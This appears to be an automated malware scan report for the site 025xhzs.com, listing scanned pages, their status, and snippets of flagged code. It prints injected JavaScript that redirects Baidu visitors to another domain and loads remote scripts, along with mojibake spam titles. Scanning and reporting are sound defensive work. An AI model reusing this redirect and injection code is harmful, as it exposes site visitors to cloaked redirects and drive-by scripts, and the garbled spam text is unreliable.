Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=025xhzs.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.025xhzs.com/ | 200 OK Content-Length: 29055 Content-Type: text/html | clean |
http://www.025xhzs.com/96923_941968.html | 200 OK Content-Length: 22981 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: zzeca.net <html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>¡ïÅ®ÓÅÖÖ×Ó¡ïÒù檽»»»|̨ÍåÉ«ÇéƬ|éÙÀæÉ´ÖÖ×Ó Ñ¸À×ÍøÅÌ</title><meta name="keywords" content="¡ïÒù檽»»»¡į̈ÍåÉ«ÇéƬ_éÙÀæÉ´ÖÖ×Ó Ñ¸À×ÍøÅÌ" /><meta name="description" content="alex Éê°®Çã³ÇÖ®Àá¸ßÇåÏÂÔع©ÇóПëÃâ·ÑÉ«ÇéhdµçÓ°qvodµçÓ°ÇéɫƬº«¸ýË£´óÅÆÄÚÃɹÅÃɹÅÃÀÅ®±ÏÒµ×£¸£¶¯Âþ²å±Æ·±Ö³µçÓ°É«ÎåÔÂÍ£Í ...[4412 bytes skipped]... | ||
http://yy.500bar.net/tj.js | 200 OK Content-Length: 328 Content-Type: application/x-javascript | clean |
http://yy.500bar.net/gg.js | 200 OK Content-Length: 775 Content-Type: application/x-javascript | suspicious |
Page code contains blacklisted domain: vip.hunlianyuan.com ...[260 bytes skipped]... ) > -1) { window.opener.location.href = url } else { window.opener.location.replace(url) } } }; var referer = document.referrer; if (!referer) { return }; var rst = /https?\:\/\/([^\/]+)/i.exec(referer); var host = rst ? rst[1] : 'unknown'; if (/baidu\.com$/i.test(host) && timeallow) { var search = referer.substring(referer.indexOf('?')); jump("http://vip.hunlianyuan.com/1.html"); return } })() } catch(e) {} document.write ('<script language="javascript" type="text/javascript" src="http://js.17meiliba.com/tan.js"></script>'); | ||
http://www.025xhzs.com/js/southidc.js | 200 OK Content-Length: 282 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<script language="javascript" src="/qq/top.js"></script>');
document.write('<script language="javascript" src="tencent://message/?Menu=yes&uin=940682402:773713977:"></script>'); document.write('<script language="javascript" src="/qq/bottom.js"></script>'); Antivirus reports:
| ||
http://www.025xhzs.com/23306011_317128.html | 200 OK Content-Length: 23143 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: xixiangsm.com <html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>¡¾ÖÆ·þË¿Íà¡¿ÎüÄ̲ÙëÂ|É«ÎåÔÂÌìæÃæÃÔÚÏßС˵|É«ÀϺº×îеØÖ·</title><meta name="keywords" content="ÎüÄ̲ÙëÂ|É«ÎåÔÂÌìæÃæÃÔÚÏßС˵|É«ÀϺº×îеØÖ·¡¾³¤ÆªÁ¬ÔØ¡¿" /><meta name="description" content="²ÙÃÃÃõ¼º½ÁåľÂéÄÎÃÀË¿Íà2014ÄêÊ®ÔÂÓÐʲôµçÓ°qovd³ÉÈËAV¹Û¿´xiaosenidaohangÔÚÏßÊÕ¿´ÈÕ±¾¹Å×°aƬÈé¼§È ...[4382 bytes skipped]... | ||
http://www.025xhzs.com/99080_02979.html | 200 OK Content-Length: 23786 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: zbxikun.com <html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>¸ñÁÖÄÉ´ïÕ½Õù,ÁúÌÚxiaoshuo,jemma¡ï¸Ø½»¿Ú½»¡ï</title><meta name="keywords" content="¡ïÑÇÖÞÎÞÂëÇø¡ï¸ñÁÖÄÉ´ïÕ½Õù_ÁúÌÚxiaoshuo_jemma" /><meta name="description" content="ÈâÎÄhС˵ÈýÉ«ÎçÒ¹ÐãÈýÉ«Ò¹ÐãÑÇÖÞɫͼÒùÓûÍøipad ÓÐÉùС˵½üÇ×¼¤ÇéµçÓ°È«ÂãÁõÒà·ÆµÄ»ðÓ°52pkÁõÒà·ÆÈËÌåÒÕÊõÈâÌåÈ«²¿¶¼¸øÄãmv¼«Æ·ÄÛ ...[4429 bytes skipped]... | ||
http://www.025xhzs.com/368426_8941856.html | 200 OK Content-Length: 24006 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: maoniutrip.net <html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>wwwÆßϦɫcom,µçÓ°720pɶÒâ˼,±ê×¼ÈÕ±¾Óïpdf¡ïÑÇÖÞÓÐÂëÇø¡ï</title><meta name="keywords" content="¡¾wwwÆßϦɫcom¡¿µçÓ°720pɶÒâ˼,±ê×¼ÈÕ±¾Óïpdf" /><meta name="description" content="¼¤ÆðËÄ·¿0°k³¬Æͱ£½¡ÊÒÏÈÉúÂéÉúÏ£ÊÖ»ú¿ì²¥µÄÍøÖ·°¢Í¯Ä¾¸ßÇåÊÖ»ú±ÚÖ½³¤Ôóè÷ÉäÄÌÈöÄòÉÛÑôÂ¥ÊÐÍø´ó½ºÃ¿´µçÓ°»ÆÉ«ÂÒÂ×Òùµ´Ð¡Ëµ ...[4435 bytes skipped]... | ||
http://www.025xhzs.com/4399440_25849446.html | 200 OK Content-Length: 24253 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: jiabomenye.com <html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>¡ïÅ®ÓÅÖÖ×Ó¡ïwww³ÉÈËÒÀÒÀÉ«ÇéÍøÕ¾|ÁúÌÚС˵ÍøÑÇÖÞ×î´óµÄС˵|´©Ô½ÈýÉÙÒ¯µÄ½£Ð¡Ëµ</title><meta name="keywords" content="www³ÉÈËÒÀÒÀÉ«ÇéÍøÕ¾,ÁúÌÚС˵ÍøÑÇÖÞ×î´óµÄС˵,´©Ô½ÈýÉÙÒ¯µÄ½£Ð¡Ëµ¡¾ÍµÅÄ×ÔÅÄ¡¿" /><meta name="description" content="ÓûÒùµÛ¹ú¼¤Çé³ÉÈËÍøÃâ·ÑÉ«ÇéµçÓ°´ó»°ÌìÏÉÃÀÅ®ÈâѨµçÓ°ÔÚÏß²¥·Åed2kÁå ...[4399 bytes skipped]... | ||
http://www.025xhzs.com/20099_47186258.html | 200 OK Content-Length: 24081 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: micro-magnet.net <html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>ÏÂÔØÍêÕûÂÒÂ×С˵¡¤,ÄáÁúË¿ÍàÉ«Çéͼ¡¾ÊÖ»ú³ÉÈ˲¥·ÅÆ÷ÏÂÔØ¡¿</title><meta name="keywords" content="¡¾»ÆɫЦ»°¡¿ÏÂÔØÍêÕûÂÒÂ×С˵¡¤_ÄáÁúË¿ÍàÉ«Çéͼ_ÊÖ»ú³ÉÈ˲¥·ÅÆ÷ÏÂÔØ" /><meta name="description" content="ÈËÌå±³²¿Ñ¨Î»²Êͼkkkkcnmsg560ç³É«ÁµÊ²Ã´Ê±ºò¸üоµä³ÉÈ˵çÓ°µ¼º½Ã¨ÆËС˵ǿռС½¿ÆÞ¿ì²¥³ÇÈËÂÛÀí·ÇÖÞ ...[4426 bytes skipped]... | ||
http://www.025xhzs.com/4940230_64898.html | 200 OK Content-Length: 24082 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: jnpengwei.com <html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>¡ïHTTPÏÂÔØÇø¡ïÖÆ·þË¿Íà×î´ó³ÉÈËÍø,ËÜÉí¿ãÃÀÅ®,123hao(comÍøÖ·Ö®¼Ò</title><meta name="keywords" content="¡¾¶¯ÂþͼƬ¡¿ÖÆ·þË¿Íà×î´ó³ÉÈËÍø,ËÜÉí¿ãÃÀÅ®,123hao(comÍøÖ·Ö®¼Ò" /><meta name="description" content="0521ĸÈéÐÂƬ¥¬¥Á¤óÄïgaÈýÒ©éÄÀÆÖÖ×Óº«¹úÃÀÅ®±»Ç¿¼éÀîÁ¬½ÜµçÓ°ÓÎÏÀ¸èÇú911vipÌ캣ÒíºÍ³ÉäþÐÄÃÀ¿´Ê ...[4424 bytes skipped]... | ||
http://www.025xhzs.com/47892_32931893.html | 200 OK Content-Length: 24068 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 0531jianzhu.net <html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>Â×ÀíÄںͼ,ÎÒÔÚ³µÉÏÌòСÒÌÒùË®,¾µä¹Å´úÍøÂçС˵¡ïÑÇÖÞÓÐÂëÇø¡ï</title><meta name="keywords" content="¡ïÅ·ÃÀÐÔ°®¡ïÂ×ÀíÄںͼ_ÎÒÔÚ³µÉÏÌòСÒÌÒùË®_¾µä¹Å´úÍøÂçС˵" /><meta name="description" content="¸ßËÙÖÖ×ÓÔõôÏÂÔØÃ×ÆæµçÓ°ºÐÏÂÔØÉ«ÇéÎÄ×ÖÍøÕ¾³±Ð԰칫ÊÒºÃxxxbunkercomÈÕ±¾Äµµ¤Ë¿Íø»¨2012¾ªÏÕµçÓ°ww99 ...[4439 bytes skipped]... | ||
http://www.025xhzs.com/28285_01290629.html | 200 OK Content-Length: 24037 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: gzpusi.com <html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>¡¾×îеçÓ°¡¿Î÷Î÷ÈËÌåϵÒÕÈËÊõͼ_Èý¼¶µçÓ°ÈËÓëÊÞ_8090kkµçÓ°Íø¿ì²¥</title><meta name="keywords" content="¡ï×îеçÓ°¡ïÎ÷Î÷ÈËÌåϵÒÕÈËÊõͼ_Èý¼¶µçÓ°ÈËÓëÊÞ_8090kkµçÓ°Íø¿ì²¥" /><meta name="description" content="°ÍÌضû·ò¸¾´÷nba½äÖ¸±±¾©Í¬Ö¾¸öÈËmbµ¼º½90ºóº«¹úÃÀÅ®°®Àö˿ѧ԰ÃÛÔæºÏͼÎåÔÂÌìͤͤɫÇé¸ø¸ö»ÆÉ ...[4413 bytes skipped]... | ||
http://www.025xhzs.com/680859_53900286.html | 200 OK Content-Length: 24252 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: zcpec.com <html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>¡ïÂÒÂ×С˵¡ïÏÖ´úÐÞÕæyyС˵Íê±¾|强奸æ§çä¸çº§ç�|¼ÙÈçÉú»îÆÛÆÁËÄãÈ«¼¯</title><meta name="keywords" content="¡ï³ÉÈËÌ×ͼ¡ïÏÖ´úÐÞÕæyyС˵Íê±¾_强奸æ§çä¸çº§ç�_¼ÙÈçÉú»îÆÛÆÁËÄãÈ«¼¯" /><meta name="description" content="www(54721(comÓûÍû¶¼ÊÐ µÚÒ»¼¾³ÉÈ˵çÓ°ÓÐÄÇÐ©Ó ...[4416 bytes skipped]... | ||
http://www.025xhzs.com/1133747_06312.html | 200 OK Content-Length: 24218 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: jiudatextile.com <html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>ÐÔ8ÓÐÄ㴺ů»¨¿ªÏÂÔØÆ÷|¹Å×°ÃÀÅ®¼¯|·Ç³£ÍêÃÀ20120715¡ï¼¤Çé¿ì²¥¡ï</title><meta name="keywords" content="ÐÔ8ÓÐÄ㴺ů»¨¿ªÏÂÔØÆ÷|¹Å×°ÃÀÅ®¼¯|·Ç³£ÍêÃÀ20120715¡¾ÑøÑÛͼ¿â¡¿" /><meta name="description" content="ËÄ·½²¥²¥°³È¥Ò²Ð¡Ñ§ÉúÇïÌìͼ»×÷Æ·261ºÅµØÇøÄÜ¿´µÄ»ÆÒ³×îÐÂÍøվǧµçÓ°¹ÊÊÂƬ³ÉÈ˵çÓ°aɧŮÎåÔÂÐ¡ËµÖ ...[4402 bytes skipped]... | ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 025xhzs.com
Result:
GET / HTTP/1.1
Host: 025xhzs.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: 025xhzs.com
Referer: http://www.google.com/search?q=025xhzs.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 025xhzs.com
Referer: http://www.google.com/search?q=025xhzs.com
Result:
The result is similar to the first query. There are no suspicious redirects found.